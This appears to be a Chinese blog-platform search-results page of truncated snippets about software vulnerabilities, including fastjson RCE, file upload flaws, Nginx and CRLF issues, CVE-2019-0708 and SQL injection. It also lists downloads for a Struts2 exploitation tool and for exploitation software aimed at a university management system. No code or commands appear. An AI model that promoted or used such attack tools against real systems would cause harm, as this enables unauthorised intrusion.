    fastjson远程代码执行安全漏洞(以下简称RCE漏洞),最早是官方在2017年3月份发出的声明, security_update_20170315 没错,强如阿里这样的公司也会有漏洞。代码是人写的,有漏洞是难免的。关键是及时的修复。 声明中...
  • 文件上传漏洞

    千次阅读 2020-10-21 21:44:21
    文件上传漏洞 一、文件上传原理 1.在文件上传的功能处,若服务端脚本语言未对上传的文件进行严格验证和过滤,导致恶意用户上传恶意的脚本文件时,就有可能获取执行服务端命令的能力,这就是文件上传漏洞。 2.文件...
  • Nginx漏洞总结

    千次阅读 2021-10-08 21:53:54
    影响版本 Nginx 0.5.6 – 1.13.2 漏洞复现 开启漏洞 在靶机web根目录下创建一个图片文件当缓存文件 去靶机中的 /tmp/nginx中查看缓存文件,可以看到,cache key的内容保存在了里面,此外还有服务器信息,这些都是...
  • Struts2漏洞利用工具

    热门讨论 2014-02-14 10:55:38
    直接输入出现漏洞的url即可攻击. 远程攻击、攻击难度低、不需要用户认证,对机密性、完整性、可用性均构成完全影响。建议大家升级最新jar包!
  • CRLF注入漏洞 nginx的错误配置如下,该配置的用意是让http请求跳转到https请求。其中uri就是我们的访问的地址,该变量可控。其中‘https://uri就是我们的访问的地址,该变量可控。其中`https://uri就是我们的访问的...
  • 系统安全系列作者将深入研究恶意样本分析、逆向分析、攻防实战和Windows漏洞利用等,通过在线笔记和实践操作的形式分享与博友们学习,希望能与您一起进步。前文介绍了Windows远程桌面服务漏洞(CVE-2019-0708),该...
  • 常见WEB漏洞原理分析

    千次阅读 2019-08-09 11:47:05
    一、SQL注入漏洞 SQL注入攻击(SQL Injection),简称注入攻击、SQL注入,被广泛用于非法获取网站控制权,是发生在应用程序的数据库层上的安全漏洞。在设计程序,忽略了对输入字符串中夹带的SQL指令的检查,被数据库...
  • 正方漏洞利用软件

    热门讨论 2014-08-24 16:58:05
    教学管理信息系统本着高起点高标准、既适应当前又考虑未来发展的原则,具有界面友好、易于掌握、操作简单、功能齐全、安全可靠、运用广泛等特点。

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 427,748
精华内容 171,099
关键字:

漏洞